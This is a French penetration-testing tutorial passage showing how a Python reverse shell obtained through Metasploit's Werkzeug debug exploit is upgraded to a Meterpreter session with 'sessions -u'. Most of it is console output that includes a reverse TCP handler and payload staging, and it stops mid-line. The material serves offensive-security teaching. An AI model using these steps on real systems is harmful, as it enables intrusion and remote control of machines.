Sommaire

Vers Meterpreter et au-delà

Obtenir un shell Meterpreter sur une machine cible se rapproche du Saint Graal. Néanmoins, dans certaines exploitations, il n’est pas toujours possible d’obtenir le tant convoité Meterpreter :

msf5 exploit(multi/http/werkzeug_debug_rce) > sessions -l  
 
Active sessions  
===============  
 
 Id  Name  Type                 Information  Connection 
 --  ----  ----                 -----------  ---------- 
 1         shell python/python               192.90.63.2:4444 -> 
192.90.63.3:48162 (192.90.63.3)

Malgré cela, il reste une possibilité d’obtenir le shell souhaité grâce à la commande sessions -u :

msf5 exploit(multi/http/werkzeug_debug_rce) > sessions -u 1 
[*] Executing ’post/multi/manage/shell_to_meterpreter’ on session(s): 
[1] 
 
[!] SESSION may not be compatible with this module. 
[*] Upgrading session ID: 1 
[*] Starting exploit/multi/handler 
[*] Started reverse TCP handler on 192.90.63.2:4433 
[*] Sending stage (861480 bytes) to 192.90.63.3 
[*] Meterpreter session 2 opened (192.90.63.2:4433 ->  ...